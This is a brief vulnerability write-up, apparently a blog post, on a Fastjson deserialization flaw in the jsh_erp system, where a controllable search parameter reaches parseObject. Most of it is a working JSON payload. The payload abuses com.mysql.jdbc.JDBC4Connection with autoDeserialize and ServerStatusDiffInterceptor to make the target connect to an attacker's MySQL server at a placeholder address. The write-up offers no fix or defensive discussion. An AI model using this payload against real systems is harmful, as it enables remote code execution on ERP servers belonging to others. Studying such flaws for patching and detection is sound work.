jsh_erp

(Updated: )

The vulnerability lies in the use of parseObject(search).
image-20250529155817586

The search parameter is controllable, allowing for a deserialization attack, as shown below:
image-20250529155936080

The payload used in the search parameter is as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
json复制编辑{
    "name": {
        "@type": "com.mysql.jdbc.JDBC4Connection",
        "databaseToConnectTo": "dbname",
        "hostToConnectTo": "xxx.xxx.xxx.xxx",
        "info": {
            "NUM_HOSTS": "1",
            "autoDeserialize": "true",
            "password": "pass",
            "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "user": "username"
        },
        "portToConnectTo": 3308,
        "url": ""
    }
}